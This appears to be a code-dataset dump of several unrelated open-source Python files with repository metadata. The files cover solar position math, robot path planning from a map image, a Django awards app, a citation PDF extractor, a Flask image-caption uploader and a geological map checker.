eps=math.radians(ecliptic(jd))
ra=math.degrees(math.atan2(math.cos(eps)*math.sin(lon),math.cos(lon)))
dec=math.degrees(math.asin(math.sin(eps)*math.sin(lon)))
return ra,dec
def longitude(jd):
'''longitude of Sun'''
T=(jd-2451545)/36525.
L=math.radians(280.46646+36000.76983*T+0.0003032*T**2)
M=math.radians(357.52911+35999.05029*T-0.0001537*T**2)
C=math.radians((1.914602-0.004817*T-0.000014*T**2)*math.sin(M)+(0.019993-0.000101*T)*math.sin(2*M)+0.000289*math.sin(3*M))
lon=L+C
return math.degrees(lon)
def distance(jd,km=True):
'''Earth-Sun distance in km'''
T=(jd-2451545)/36525.
e=0.016708634-0.000042037*T-0.0000001267*T**2
M=math.radians(357.52911+35999.05029*T-0.0001537*T**2)
C=math.radians((1.914602-0.004817*T-0.000014*T**2)*math.sin(M)+(0.019993-0.000101*T)*math.sin(2*M)+0.000289*math.sin(3*M))
nu=M+C
R=1.000001018*(1-e**2)/(1+e*math.cos(nu))
if km: R*=AU
return R
| 26.291667
| 126
| 0.62916
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 145
| 0.114897
|
4233e43b1aa8c3735bfa71a29e6ebbf01825729f
| 5,681
|
py
|
Python
|
test/paths.py
|
cychitivav/kobuki_navigation
|
9da1ad425b8804b49005720594e9837295eb9976
|
[
"MIT"
] | null | null | null |
test/paths.py
|
cychitivav/kobuki_navigation
|
9da1ad425b8804b49005720594e9837295eb9976
|
[
"MIT"
] | null | null | null |
test/paths.py
|
cychitivav/kobuki_navigation
|
9da1ad425b8804b49005720594e9837295eb9976
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
import numpy as np
import cv2
from matplotlib import pyplot as plt
import networkx as nx
def rotate_image(image, angle):
image_center = tuple(np.array(image.shape[0:2]) / 2)
rot_mat = cv2.getRotationMatrix2D(image_center, angle, 1)
vertical = cv2.warpAffine(image, rot_mat, image.shape[0:2], flags=cv2.INTER_CUBIC)
im = vertical.copy()
for i in range(image.shape[0]):
for j in range(image.shape[1]):
if i < 100 or j < 100 or j > 924 or i > 924:
im[i,j] = 205
else:
neighbor = 0
if vertical[i+1,j] < 43.0:
neighbor += 1
if vertical[i-1,j] < 43.0:
neighbor += 1
if vertical[i+1,j-1] < 43.0:
neighbor += 1
if vertical[i+1,j+1] < 43.0:
neighbor += 1
if vertical[i-1,j+1] < 43.0:
neighbor += 1
if vertical[i-1,j-1] < 43.0:
neighbor += 1
if vertical[i,j+1] < 43.0:
neighbor += 1
if vertical[i,j-1] < 43.0:
neighbor += 1
if neighbor >= 5:
im[i,j] = 0
return im
if __name__ == "__main__":
image = cv2.imread('map/map.pgm', 0)
rotated = rotate_image(image, -7.66)
#cv2.imwrite('map/rotated.pgm', rotated)
_, th = cv2.threshold(rotated, 245, 255, cv2.THRESH_BINARY)
kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (3,3))
op = cv2.morphologyEx(th, cv2.MORPH_OPEN, kernel)
skel = cv2.ximgproc.thinning(op)
plt.figure()
plt.subplot(1,3,1)
plt.imshow(image, cmap='gray')
plt.axis('off')
plt.title('Original')
plt.subplot(1,3,2)
plt.imshow(rotated, cmap='gray')
plt.axis('off')
plt.title('Rotada')
plt.subplot(1,3,3)
plt.imshow(skel, cmap='gray')
plt.axis('off')
plt.title('Adelgazada')
base = cv2.dilate(skel, None, iterations=12)
path = cv2.cvtColor(base, cv2.COLOR_GRAY2RGB)
corners = cv2.cornerHarris(skel,7,7,0.04)
corners = cv2.dilate(corners, None)
_, corners = cv2.threshold(corners,0.001,255,cv2.THRESH_BINARY)
corners = np.uint8(corners)
contours, _ = cv2.findContours(corners,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
path[corners>0.0]=[0,255,0]
cv2.drawContours(path,contours,-1,(255,0,0),1)
G = nx.Graph()
points = []
for i, c in enumerate(contours):
# calculate moments for each contour
M = cv2.moments(c)
# calculate x,y coordinate of center
cX = int(round(M["m10"] / M["m00"]))
cY = int(round(M["m01"] / M["m00"]))
path[cY,cX]=[0,0,255]
G.add_node(i, pos=(cX,cY))
points.append((cX,cY))
font = cv2.FONT_HERSHEY_SIMPLEX
fontScale = 0.4
fontColor = (0,0,255)
thickness = 1
path = cv2.putText(path, str(i), (cX,cY), font, fontScale, fontColor, thickness)
plt.figure()
plt.subplot(1,2,1)
plt.imshow(base,cmap='gray')
plt.axis('off')
plt.title('Imagen base')
plt.subplot(1,2,2)
plt.imshow(path)
plt.axis('off')
plt.title('Esquinas')
noBlack = cv2.countNonZero(cv2.cvtColor(path,cv2.COLOR_BGR2GRAY))
for i, p1 in enumerate(points):
for j, p2 in enumerate(points):
if p1 == p2: continue
test_img = cv2.line(path.copy(), p1, p2, (234,0,234), 1)
# Recount to see if the images are the same
if cv2.countNonZero(cv2.cvtColor(test_img,cv2.COLOR_BGR2GRAY)) == noBlack:
# path = cv2.line(path, p1, p2, (234,0,234), 1)
G.add_edge(i,j,weight=np.hypot(p1[0]-p2[0], p1[1]-p2[1]))
plt.figure()
nx.draw(G,with_labels=True)
x_0, y_0 = [492,500]
x_f = np.random.randint(487) + 277
y_f = np.random.randint(448) + 368
path[y_0+1,x_0+1] = (255,0,0)
path[y_f+1,x_f+1] = (255,0,0)
_, th = cv2.threshold(rotated, 245, 255, cv2.THRESH_BINARY)
ero = cv2.erode(th,None,iterations=10)
th = ero.copy()
noBlack = cv2.countNonZero(th)
for i, p in enumerate(points):
test_img = cv2.line(th.copy(), (x_0,y_0), p, 234, 1)
# Recount to see if the images are the same
if cv2.countNonZero(test_img) == noBlack:
# path = cv2.line(path, p1, p2, (234,0,234), 1)
G.add_edge('p_0',i,weight=np.hypot(p[0]-x_0, y_0-p[1]))
for i, p in enumerate(points):
test_img = cv2.line(th.copy(), (x_f,y_f), p, 234, 1)
# Recount to see if the images are the same
if cv2.countNonZero(test_img) == noBlack:
# path = cv2.line(path, p1, p2, (234,0,234), 1)
G.add_edge('p_f',i,weight=np.hypot(p[0]-x_f, y_f-p[1]))
plan = nx.shortest_path(G,'p_0','p_f')
print plan
for i in range(len(plan)-1):
if i == 0:
path = cv2.line(path, (x_0,y_0), points[plan[i+1]], (251,229,78), 1)
elif i == len(plan)-2:
path = cv2.line(path, points[plan[i]], (x_f,y_f), (251,229,78), 1)
else:
path = cv2.line(path, points[plan[i]], points[plan[i+1]], (251,229,78), 1)
plt.figure()
plt.imshow(ero,cmap='gray')
plt.axis('off')
plt.title('Imagen erosionada')
plt.show()
| 31.38674
| 88
| 0.520155
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 594
| 0.104559
|
4233e6b88d45b6951dc540a0e3110566d67aa657
| 458
|
py
|
Python
|
intro-to-programming/python-for-everyone/3-variables-expressions-statements/exercise-4.py
|
udpsunil/computer-science
|
94e3dfc7d39ad139671ab1a3457a61a1fd48fe39
|
[
"MIT"
] | null | null | null |
intro-to-programming/python-for-everyone/3-variables-expressions-statements/exercise-4.py
|
udpsunil/computer-science
|
94e3dfc7d39ad139671ab1a3457a61a1fd48fe39
|
[
"MIT"
] | null | null | null |
intro-to-programming/python-for-everyone/3-variables-expressions-statements/exercise-4.py
|
udpsunil/computer-science
|
94e3dfc7d39ad139671ab1a3457a61a1fd48fe39
|
[
"MIT"
] | null | null | null |
# Assume that we execute the following assignment statements
# width = 17
# height = 12.0
width = 17
height = 12.0
value_1 = width // 2
value_2 = width / 2.0
value_3 = height / 3
value_4 = 1 + 2 * 5
print(f"value_1 is {value_1} and it's type is {type(value_1)}")
print(f"value_2 is {value_2} and it's type is {type(value_2)}")
print(f"value_3 is {value_3} and it's type is {type(value_3)}")
print(f"value_4 is {value_4} and it's type is {type(value_4)}")
| 26.941176
| 63
| 0.68559
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 311
| 0.679039
|
42370720ae2a40bece1dbd04a95205d5f5073cbf
| 131
|
py
|
Python
|
apps/weapons/admin.py
|
tufbel/wFocus
|
ee0f02053b8a5bc9c40dd862306fc5df1a063b9d
|
[
"Apache-2.0"
] | null | null | null |
apps/weapons/admin.py
|
tufbel/wFocus
|
ee0f02053b8a5bc9c40dd862306fc5df1a063b9d
|
[
"Apache-2.0"
] | 11
|
2020-06-06T01:51:51.000Z
|
2022-02-10T14:31:21.000Z
|
apps/weapons/admin.py
|
tufbel/wFocus
|
ee0f02053b8a5bc9c40dd862306fc5df1a063b9d
|
[
"Apache-2.0"
] | null | null | null |
from django.contrib import admin
# Register your models here.
from apps.weapons.models import Weapon
admin.site.register(Weapon)
| 18.714286
| 38
| 0.80916
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 28
| 0.21374
|
4237a4d8945ebfffd7fd8c863df2a43bde57f4e3
| 975
|
py
|
Python
|
modules/kubrick/apps/awards/models.py
|
Lab-Quatro/aposcar
|
97631f2e3939566cc4e5b81e50c58ce03a5350a4
|
[
"MIT"
] | 3
|
2021-07-05T14:18:27.000Z
|
2021-09-02T10:15:55.000Z
|
modules/kubrick/apps/awards/models.py
|
Lab-Quatro/aposcar
|
97631f2e3939566cc4e5b81e50c58ce03a5350a4
|
[
"MIT"
] | 1
|
2021-10-31T21:40:39.000Z
|
2021-10-31T21:40:39.000Z
|
modules/kubrick/apps/awards/models.py
|
Lab-Quatro/aposcar
|
97631f2e3939566cc4e5b81e50c58ce03a5350a4
|
[
"MIT"
] | null | null | null |
from django.db import models
class Nominee(models.Model):
name = models.TextField()
picture_url = models.ImageField(upload_to="nominees/")
description = models.TextField(max_length=350)
class Meta:
verbose_name_plural = "nominees"
def __str__(self):
return self.name
class Category(models.Model):
name = models.CharField(max_length=40)
url_field = models.CharField(max_length=40)
class Meta:
verbose_name_plural = "categories"
def __str__(self):
return self.name
class Indication(models.Model):
nominated = models.ForeignKey(Nominee, on_delete=models.CASCADE)
category = models.ForeignKey(
Category, on_delete=models.CASCADE, related_name="indications"
)
year = models.IntegerField()
annotation = models.TextField(blank=True)
is_winner = models.BooleanField(default=False)
def __str__(self):
return f'"{self.nominated.name}" on "{self.category.name}"'
| 25.657895
| 70
| 0.695385
| 937
| 0.961026
| 0
| 0
| 0
| 0
| 0
| 0
| 98
| 0.100513
|
42383a1d8efb06b1b9b9ac90bcfd5e6b24b3d414
| 6,113
|
py
|
Python
|
scholarly_citation_finder/apps/citation/search/PublicationDocumentExtractor.py
|
citationfinder/scholarly_citation_finder
|
3e6c340cfebc934a013759e27d8c145171110156
|
[
"MIT"
] | 1
|
2017-01-23T18:02:42.000Z
|
2017-01-23T18:02:42.000Z
|
scholarly_citation_finder/apps/citation/search/PublicationDocumentExtractor.py
|
citationfinder/scholarly_citation_finder
|
3e6c340cfebc934a013759e27d8c145171110156
|
[
"MIT"
] | null | null | null |
scholarly_citation_finder/apps/citation/search/PublicationDocumentExtractor.py
|
citationfinder/scholarly_citation_finder
|
3e6c340cfebc934a013759e27d8c145171110156
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
import logging
from datetime import datetime
from scholarly_citation_finder import config
from scholarly_citation_finder.apps.parser.Parser import Parser
from scholarly_citation_finder.apps.core.models import PublicationUrl
from scholarly_citation_finder.tools.extractor.grobid.GrobidExtractor import GrobidExtractor
from scholarly_citation_finder.lib.file import download_file_pdf, DownloadFailedException, UnexpectedContentTypeException
from scholarly_citation_finder.lib.process import ProcessException
from scholarly_citation_finder.apps.parser.Exceptions import ParserRollbackError
from scholarly_citation_finder.lib.string import normalize_string
from scholarly_citation_finder.tools.extractor.grobid.TeiParser import TeiParserNoDocumentTitle,\
TeiParserNoReferences
from scholarly_citation_finder.tools.nameparser.StringMatching import nearly_match
logger = logging.getLogger(__name__)
class PublicationDocumentExtractor:
'''
Class to extract a document.
'''
NUM_MINIMUM_REFERENCES = 3
def __init__(self, database='default'):
'''
Create object.
:param database: Database name
'''
self.extractor = GrobidExtractor() # used to extract documents
self.parser = Parser(database=database) # used to store results
def extract_and_store(self, publication, url):
'''
Extract the publication from the given URL and store the result.
:param publication:
:param url:
:raise ExtractorNotAvaiableException:
'''
try:
document_meta, references = self.extract(publication.title, publication.id, url=url) # raises ExtractorNotAvaiableException
if document_meta and references:
self.__store_document_meta(publication=publication, document_meta=document_meta)
self.__store_references(publication=publication, url=url, references=references)
return True
# Download failed
except(DownloadFailedException, UnexpectedContentTypeException) as e:
logger.info('{}: {}'.format(type(e).__name__, str(e)))
# Extractor failed
except(ProcessException) as e:
logger.info('{}: {}'.format(type(e).__name__, str(e)))
# Storage failed
except(ParserRollbackError) as e:
logger.warn(e, exc_info=True)
return False
def extract(self, publication_title, publication_id, url):
'''
Try to download the document from the given URL and extract it.
:param publication_title: Title of the publication to check, if it's the correct document
:param publication_id: ID of the publication. Used for the filename of the temporary stored document
:param url: Document URL
:return: Document meta object, references array
False, False if (a) it failed to download the document (b) or the document has no title or references
:raise ProcessException: Extractor failed
:raise ExtractorNotAvaiableException: Extractor is not available
:raise DownloadFailedException: Download failed
:raise UnexpectedContentTypeException: File for given URL has the wrong content type
'''
try:
filename = download_file_pdf(url, path=config.DOWNLOAD_TMP_DIR, name='{}_tmp.pdf'.format(publication_id))
document_meta, references = self.extractor.extract_file(filename, completely=True)
# Check title
document_meta_title = document_meta['publication']['title'].lower().strip()
if not nearly_match(document_meta_title, publication_title):
logger.info('Wrong title! Is "%s", should "%s"' % (document_meta_title, publication_title) )
return False, False
# Check number of references
if len(references) < self.NUM_MINIMUM_REFERENCES:
logger.info('Not enough references')
return False, False
return document_meta, references
# Tei failed (invalid document)
except(TeiParserNoDocumentTitle, TeiParserNoReferences) as e:
logger.info('{}: {}'.format(type(e).__name__, str(e)))
return False, False
def __store_references(self, publication, references, url):
'''
Store the URL and the references.
:param publication: Publication that was extracted
:param references: References list, extracted from the document
:param url: URL of the document that was extracted
:raise ParserRollbackError: Storage (database commit) of the references failed
'''
publication_url = publication.publicationurl_set.create(url=url[:200],
type=PublicationUrl.MIME_TYPE_PDF,
extraction_date=datetime.now())
for reference in references:
# TODO: check if paper already exists (!)
reference['reference']['publication_id'] = publication.id
reference['reference']['source_id'] = publication_url.id
reference['publication']['source'] = '{}:{}'.format(reference['publication']['source'], publication_url.id)
self.parser.parse(**reference)
self.parser.commit() # raises ParserRollbackError
def __store_document_meta(self, publication, document_meta):
'''
Store the extracted head meta data.
:param publication: Publication object
:param document_meta: Extracted head meta data
'''
if 'keywords' in document_meta:
for keyword in document_meta['keywords']:
keyword = normalize_string(keyword)
if len(keyword) <= 100:
publication.publicationkeyword_set.get_or_create(name=keyword)
else:
logger.info('keyword "%s" is too long' % keyword)
| 45.962406
| 135
| 0.657615
| 5,169
| 0.845575
| 0
| 0
| 0
| 0
| 0
| 0
| 2,205
| 0.360707
|
423985c9471e18c947bb00b13f5fb82114424fab
| 2,884
|
py
|
Python
|
webapp/web.py
|
thunderz99/azure_image_caption
|
f7d3649051c948c9651b7d3f9df006d84449cc14
|
[
"MIT"
] | 1
|
2019-04-19T13:22:15.000Z
|
2019-04-19T13:22:15.000Z
|
webapp/web.py
|
thunderz99/azure_image_caption
|
f7d3649051c948c9651b7d3f9df006d84449cc14
|
[
"MIT"
] | null | null | null |
webapp/web.py
|
thunderz99/azure_image_caption
|
f7d3649051c948c9651b7d3f9df006d84449cc14
|
[
"MIT"
] | null | null | null |
import sys
import os
import json
import urllib
from PIL import Image
from flask import Flask, request, redirect, url_for
from flask import send_from_directory, render_template
from werkzeug.utils import secure_filename
from datetime import datetime
from caption_service import CaptionService
from translation_service import TranslationService
sys.path.append(os.curdir) # カレントファイルをインポートするための設定
UPLOAD_FOLDER = '/tmp/uploads'
os.makedirs(UPLOAD_FOLDER, exist_ok=True)
ALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg', 'gif'])
app = Flask(__name__, static_url_path='/static', static_folder='assets/static')
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
cs = CaptionService()
ts = TranslationService()
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS
@app.route('/flask/uploader', methods=['POST'])
def upload_file():
# check if the post request has the file part
# create a special subfolder for the files uploaded this time
# to avoid overwrite
subdir = datetime.now().strftime('%Y%m%d_%H%M%S')
current_files_dir = os.path.join(UPLOAD_FOLDER, subdir)
os.makedirs(current_files_dir, exist_ok=True)
upload_files = request.files.getlist('file[]')
ret = []
for file in upload_files:
image = {}
print('filename is', file.filename)
filename = secure_filename(file.filename)
image['filename'] = filename
filepath = os.path.join(current_files_dir, filename)
print('file saving to ', filepath)
file.save(filepath)
image['url'] = '/flask/uploads/{}/{}'.format(
subdir, urllib.parse.quote_plus(filename))
print('begin predict', filepath)
caption_en, caption_ja = get_caption(filepath)
image['result'] = caption_ja
ret.append(image)
return json.dumps(ret)
@app.route('/flask/uploads/<path:filepath>')
def uploaded_file(filepath):
print("filepath is {}".format(filepath))
filename = os.path.basename(filepath)
if not filename:
return ""
path = os.path.dirname(filepath)
print("path is {}, filename is {}".format(path, filename))
image_folder = os.path.join(UPLOAD_FOLDER, path)
return send_from_directory(image_folder,
urllib.parse.unquote_plus(filename))
@app.route('/')
def serve_index():
return send_from_directory('assets', 'index.html')
@app.route('/<filename>', defaults={'filename': 'index.html'})
def serve_assets(filename):
return send_from_directory('assets', filename)
def get_caption(filepath):
print('getting caption', filepath)
caption_en = cs.get_caption(filepath)
caption_ja = ts.get_translation(caption_en)
return caption_en, caption_ja
if __name__ == '__main__':
port = os.environ.get('PORT', 5000)
app.run(host='0.0.0.0', port=port)
| 28
| 79
| 0.691054
| 0
| 0
| 0
| 0
| 1,749
| 0.597744
| 0
| 0
| 593
| 0.202666
|
423cfa9d306c6cce1a1273c94c45fb8dde9787d8
| 16,706
|
py
|
Python
|
map2loop/m2l_map_checker.py
|
Leguark/map2loop
|
365dde4490f50ad73612120a7d4bee61e54a9a18
|
[
"MIT"
] | null | null | null |
map2loop/m2l_map_checker.py
|
Leguark/map2loop
|
365dde4490f50ad73612120a7d4bee61e54a9a18
|
[
"MIT"
] | null | null | null |
map2loop/m2l_map_checker.py
|
Leguark/map2loop
|
365dde4490f50ad73612120a7d4bee61e54a9a18
|
[
"MIT"
] | null | null | null |
import geopandas as gpd
from shapely.geometry import LineString, Polygon,MultiLineString
import os.path
from map2loop import m2l_utils
import warnings
import numpy as np
import pandas as pd
#explodes polylines and modifies objectid for exploded parts
def explode_polylines(indf,c_l,dst_crs):
#indf = gpd.GeoDataFrame.from_file(indata)
outdf = gpd.GeoDataFrame(columns=indf.columns, crs=dst_crs)
for idx, row in indf.iterrows():
if type(row.geometry) == LineString:
outdf = outdf.append(row,ignore_index=True)
if type(row.geometry) == MultiLineString:
multdf = gpd.GeoDataFrame(columns=indf.columns, crs=dst_crs)
recs = len(row.geometry)
multdf = multdf.append([row]*recs,ignore_index=True)
i=0
for geom in range(recs):
multdf.loc[geom,'geometry'] = row.geometry[geom]
multdf.loc[geom,c_l['o']]=str(multdf.loc[geom,c_l['o']])+'_'+str(i)
print('map2loop warning: Fault_'+multdf.loc[geom,c_l['o']],'is one of a set of duplicates, so renumbering')
i=i+1
outdf = outdf.append(multdf,ignore_index=True)
return outdf
def check_map(structure_file,geology_file,fault_file,mindep_file,fold_file,tmp_path,bbox,c_l,dst_crs,local_paths,drift_prefix,polygo):
#y_point_list = [bbox[1], bbox[1], bbox[3], bbox[3], bbox[1]]
#x_point_list = [bbox[0], bbox[2], bbox[2], bbox[0], bbox[0]]
#bbox_geom = Polygon(zip(x_point_list, y_point_list))
#polygo = gpd.GeoDataFrame(index=[0], crs=dst_crs, geometry=[bbox_geom])
m2l_errors=[]
m2l_warnings=[]
if(local_paths):
for file_name in (structure_file,geology_file,fault_file,mindep_file,fold_file):
if not os.path.isfile(file_name):
m2l_errors.append('file '+file_name+' not found')
# Process orientation points
if (os.path.isfile(structure_file) or not local_paths):
orientations2 = gpd.read_file(structure_file,bbox=bbox)
if(c_l['sf']==c_l['ds']):
new_code='NEW_'+c_l['sf']
new_code=new_code[:10]
orientations=orientations2.rename(columns={c_l['sf']:new_code}, errors="raise")
m2l_warnings.append('To avoid conflict with geology field of same name, orientation field named "'+str(c_l['sf'])+'" renamed to "'+new_code+'"')
c_l['sf']=new_code
else:
new_code=''
orientations=orientations2.copy()
if(c_l['bo']==c_l['ds'] and not new_code==''):
c_l['bo']=new_code
if(len(orientations)<2):
m2l_errors.append('not enough orientations to complete calculations (need at least 2)')
orientations = orientations.replace(r'^\s+$', np.nan, regex=True)
orientations = orientations[orientations[c_l['d']]!=-999]
for code in ('sf','d','dd','gi'):
if not c_l[code] in orientations.columns:
if(code=='sf'):
orientations[c_l[code]]='Bed'
m2l_warnings.append('field named "'+str(c_l[code])+'" added with default value "Bed"')
elif(not code=='gi'):
m2l_errors.append('"'+c_l[code]+'" field needed')
else:
m2l_warnings.append('field named "'+str(c_l[code])+'" added with default value')
orientations[c_l[code]] = np.arange(len(orientations))
else:
nans=orientations[c_l[code]].isnull().sum()
if(nans>0):
m2l_warnings.append(''+str(nans)+' NaN/blank found in column "'+str(c_l[code])+'" of orientations file, replacing with 0')
orientations[c_l[code]].fillna("0", inplace = True)
unique_o=set(orientations[c_l['gi']])
if(not len(unique_o) == len(orientations)):
m2l_warnings.append('duplicate orientation point unique IDs')
show_metadata(orientations,"orientations layer")
# Process geology polygons
if (os.path.isfile(geology_file) or not local_paths):
geology = gpd.read_file(geology_file,bbox=bbox)
if not c_l['o'] in geology.columns:
geology = geology.reset_index()
geology[c_l['o']]=geology.index
unique_g=set(geology[c_l['o']])
if(not len(unique_g) == len(geology)):
m2l_warnings.append('duplicate geology polygon unique IDs')
nans=geology[c_l['c']].isnull().sum()
if(nans>0):
m2l_errors.append(''+str(nans)+' NaN/blank found in column "'+str(c_l['c'])+'" of geology file, please fix')
if(c_l['g']=='No_col' or not c_l['g'] in geology.columns):
m2l_warnings.append('No secondary strat coding for geology polygons')
c_l['g']='group'
geology[c_l['g']]="Top"
geology = geology.replace(r'^\s+$', np.nan, regex=True)
geology[c_l['g']].fillna(geology[c_l['g2']], inplace=True)
geology[c_l['g']].fillna(geology[c_l['c']], inplace=True)
if(c_l['r1']=='No_col' or not c_l['r1'] in geology.columns):
m2l_warnings.append('No extra litho for geology polygons')
c_l['r1']='r1'
geology[c_l['r1']]='Nope'
if(c_l['r2']=='No_col' or not c_l['r2'] in geology.columns):
m2l_warnings.append('No more extra litho for geology polygons')
c_l['r2']='r2'
geology[c_l['r2']]='Nope'
if(c_l['min']=='No_col' or not c_l['min'] in geology.columns):
m2l_warnings.append('No min age for geology polygons')
c_l['min']='min'
geology[c_l['min']]=0
if(c_l['max']=='No_col' or not c_l['max'] in geology.columns):
m2l_warnings.append('No max age for geology polygons')
c_l['max']='max'
geology[c_l['max']]=100
if(c_l['c']=='No_col' or not c_l['c'] in geology.columns):
m2l_errors.append('Must have primary strat coding field for geology polygons')
for code in ('c','g','g2','ds','u','r1'):
if(c_l[code] in geology.columns):
geology[c_l[code]].str.replace(","," ")
if(code == 'c' or code =='g' or code=='g2'):
geology[c_l[code]].str.replace(" ","_")
geology[c_l[code]].str.replace("-","_")
geology[c_l[code]].str.replace(",","_")
nans=geology[c_l[code]].isnull().sum()
if(nans>0):
m2l_warnings.append(''+str(nans)+' NaN/blank found in column "'+str(c_l[code])+'" of geology file, replacing with 0')
geology[c_l[code]].fillna("0", inplace = True)
for drift in drift_prefix:
geology=geology[~geology[c_l['u']].str.startswith(drift)]
show_metadata(geology,"geology layer")
# Process fold polylines
if (os.path.isfile(fold_file) or not local_paths):
folds = gpd.read_file(fold_file,bbox=bbox)
if(len(folds)>0):
if not c_l['o'] in folds.columns:
folds = folds.reset_index()
folds[c_l['o']]=folds.index
unique_g=set(folds[c_l['o']])
if(not len(unique_g) == len(folds)):
m2l_warnings.append('duplicate fold polyline unique IDs')
folds = folds.replace(r'^\s+$', np.nan, regex=True)
for code in ('ff','t'):
if(c_l['ff']=='No_col' or not c_l['ff'] in folds.columns):
m2l_warnings.append('No fold code for fold polylines')
c_l['ff']='ff'
folds[c_l['ff']]=c_l['fold']
if(c_l['t']=='No_col' or not c_l['t'] in folds.columns):
m2l_warnings.append('No fold polarity for fold polylines')
c_l['t']='t'
folds[c_l['t']]='None'
if(c_l[code] in folds.columns):
folds[c_l[code]].str.replace(","," ")
nans=folds[c_l[code]].isnull().sum()
if(nans>0):
m2l_warnings.append(''+str(nans)+' NaN/blank found in column "'+str(c_l[code])+'" of folds file, replacing with 0')
folds[c_l[code]].fillna("0", inplace = True)
folds_clip=m2l_utils.clip_shp(folds,polygo)
if(len(folds_clip) > 0):
folds_explode = explode_polylines(folds_clip, c_l, dst_crs)
if(len(folds_explode) > len(folds_clip)):
m2l_warnings.append(
'some folds are MultiPolyLines, and have been split')
folds_explode.crs = dst_crs
show_metadata(folds_clip,"fold layer")
else:
print('No folds in area')
# Process fault polylines
if (os.path.isfile(fault_file) or not local_paths):
faults_folds = gpd.read_file(fault_file,bbox=bbox)
faults = faults_folds[faults_folds[c_l['f']].str.contains(c_l['fault'])]
faults = faults.replace(r'^\s+$', np.nan, regex=True)
if not c_l['o'] in faults.columns:
m2l_warnings.append('field named "'+str(c_l['o'])+'" added with default value')
faults[c_l['o']] = np.arange(len(faults))
for code in ('f','o','fdip','fdipdir','fdipest'):
if(c_l['f']=='No_col' or not c_l['f'] in faults.columns ):
m2l_warnings.append('No fault type for fault polylines')
c_l['f']='ftype'
faults[c_l['f']]=c_l['fault']
if(c_l['fdip']=='No_col' or not c_l['fdip'] in faults.columns ):
m2l_warnings.append('No fault dip for fault polylines')
c_l['fdip']='fdip'
faults[c_l['fdip']]=c_l['fdipnull']
if(c_l['fdipdir']=='No_col' or not c_l['fdipdir'] in faults.columns ):
m2l_warnings.append('No fault dip direction for fault polylines')
c_l['fdipdir']='fdipdir'
faults[c_l['fdipdir']]=0
if(c_l['fdipest']=='No_col' or not c_l['fdipest'] in faults.columns ):
m2l_warnings.append('No fault dip estimate for fault polylines')
c_l['fdipest']='fdipest'
faults[c_l['fdipest']]='None'
if(c_l['fdipest_vals']=='No_col' or not c_l['fdipest_vals'] in faults.columns ):
m2l_warnings.append('No fault dip estimate text for fault polylines')
c_l['fdipest_vals']='fdipest_vals'
faults[c_l['fdipest_vals']]='None'
if(c_l['n']=='No_col' or not c_l['n'] in faults.columns ):
m2l_warnings.append('No fault name for fault polylines')
c_l['n']='fname'
faults[c_l['n']]='None'
if not c_l[code] in faults.columns:
m2l_errors.append('field named "'+str(c_l[code])+'" not found in fault/fold file')
if(c_l[code] in faults.columns):
nans=faults[c_l[code]].isnull().sum()
if(nans>0):
m2l_warnings.append(''+str(nans)+' NaN/blank found in column "'+str(c_l[code])+'" of fault file, replacing with -999')
faults[c_l[code]].fillna("-999", inplace = True)
unique_f=set(faults[c_l['o']])
if(not len(unique_f) == len(faults)):
m2l_errors.append('duplicate fault/fold polyline unique IDs')
faults = faults.replace(r'^\s+$', np.nan, regex=True)
faults_clip=m2l_utils.clip_shp(faults,polygo)
if(len(faults_clip)>0):
faults_explode=explode_polylines(faults_clip,c_l,dst_crs)
if(len(faults_explode)>len(faults_clip)):
m2l_warnings.append('some faults are MultiPolyLines, and have been split')
faults_explode.crs = dst_crs
show_metadata(faults_explode,"fault layer")
else:
#fault_file='None'
print('No faults in area')
# Process mindep points
if (os.path.isfile(mindep_file) or not local_paths):
mindeps = gpd.read_file(mindep_file,bbox=bbox)
if(len(mindeps)==0):
m2l_warnings.append('no mindeps for analysis')
else:
mindeps = mindeps.replace(r'^\s+$', np.nan, regex=True)
for code in ('msc','msn','mst','mtc','mscm','mcom'):
if(c_l[code]=='No_col'):
mindeps[c_l[code]]='No_col'
if not c_l[code] in mindeps.columns:
m2l_errors.append('field named "'+str(c_l[code])+'" not found in mineral deposits file')
else:
nans=mindeps[c_l[code]].isnull().sum()
if(nans>0):
m2l_warnings.append(str(nans)+' NaN/blank found in column '+str(c_l[code])+' of mindep file, replacing with 0')
mindeps[c_l[code]].fillna("0", inplace = True)
show_metadata(mindeps,"mindeps layer")
# explode fault/fold multipolylines
# sometimes faults go off map and come back in again which after clipping creates multipolylines
if(len(m2l_warnings)>0):
print("\nWarnings:")
warnings.warn('The warnings listed above were issued')
for w in m2l_warnings:
print(" ",w)
if(len(m2l_errors)>0):
print("\nErrors:")
warnings.warn('The errors listed above must be fixed prior to rerunning map2loop')
for e in m2l_errors:
print(" ",e)
raise NameError('map2loop error: Fix errors before running again')
if(len(m2l_errors)==0):
if(len(folds_clip)>0):
fold_file=tmp_path+'folds_clip.shp'
folds_explode=folds_explode.dropna(subset=['geometry'])
folds_explode.to_file(fold_file)
else:
fold_file=tmp_path+'fold_clip.shp'
print("\nFold layer metadata\n--------------------")
print("No folds found")
if(len(faults_clip)>0):
fault_file=tmp_path+'faults_clip.shp'
faults_explode.crs=dst_crs
faults_explode=faults_explode.dropna(subset=['geometry'])
faults_explode.to_file(fault_file)
else:
fault_file=tmp_path+'faults_clip.shp'
print("\nFault layer metadata\n--------------------")
print("No faults found")
geol_clip=gpd.overlay(geology, polygo, how='intersection')
if(len(geol_clip)>0):
geol_clip.crs=dst_crs
geol_file=tmp_path+'geol_clip.shp'
geol_clip.to_file(geol_file)
if(len(orientations)>0):
structure_file=tmp_path+'structure_clip.shp'
orientations.crs=dst_crs
orientations[c_l['dd']] = pd.to_numeric(orientations[c_l['dd']])
orientations[c_l['d']] = pd.to_numeric(orientations[c_l['d']])
orientations.to_file(structure_file)
if(len(mindeps)>0):
mindep_file=tmp_path+'mindeps_clip.shp'
mindeps.crs=dst_crs
mindeps.to_file(mindep_file)
print('\nNo errors found, clipped and updated files saved to tmp')
